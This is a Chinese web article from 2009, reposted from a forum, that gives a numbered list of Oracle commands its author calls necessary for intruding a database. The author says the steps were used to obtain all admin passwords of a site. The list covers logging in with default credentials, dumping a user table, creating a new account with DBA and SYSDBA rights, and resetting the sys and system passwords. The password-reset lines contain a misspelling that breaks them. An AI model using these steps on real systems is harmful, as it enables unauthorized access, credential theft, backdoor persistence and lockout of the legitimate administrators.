科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道入侵Oracle数据库常用操作命令

入侵Oracle数据库常用操作命令

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。发现Oracle操作起来真是太麻烦,为了大家以后少走些弯路,把入侵当中必需的命令整理出来。

来源:论坛整理 2009年1月5日

关键字: 安全技术 攻击防范 网络入侵

  • 评论
  • 分享微博
  • 分享邮件

最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。发现Oracle操作起来真是太麻烦,为了大家以后少走些弯路,把入侵当中必需的命令整理出来。

 1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。

 2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager#ora9i;(这句中请把#改为@)

 3、SQL>connect / as sysdba ;(as sysoper)或 connect internal/oracle AS SYSDBA ;(scott/tiger) conn sys/change_on_install as sysdba;

 4、SQL>startup; 启动数据库实例

 5、查看当前的所有数据库: select * from v$database; select name from v$database;

 6、desc v$databases; 查看数据库结构字段

 7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限: SQL>select * from V_$PWFILE_USERS; Show user;查看当前数据库连接用户

 8、进入test数据库:database test;

 9、查看所有的数据库实例:select * from v$instance; 如:ora9i

 10、查看当前库的所有数据表: SQL> select TABLE_NAME from all_tables; select * from all_tables; SQL> select table_name from all_tables where table_name like '%u%'; TABLE_NAME ------------------------------ _default_auditing_options_

 11、查看表结构:desc all_tables;

 12、显示CQI.T_BBS_XUSER的所有字段结构: desc CQI.T_BBS_XUSER;

 13、获得CQI.T_BBS_XUSER表中的记录: select * from CQI.T_BBS_XUSER;

 14、增加数据库用户:(test11/test) create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;

 15、用户授权: grant connect,resource,dba to test11; grant sysdba to test11; commit;

 16、更改数据库用户的密码:(将sys与system的密码改为test.) alter user sys indentified by test; alter user system indentified by test;


本篇文章来源于 中国安全在线 原文链接:http://www.cnsafer.com/Article/Tech/200810/3983.htm

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章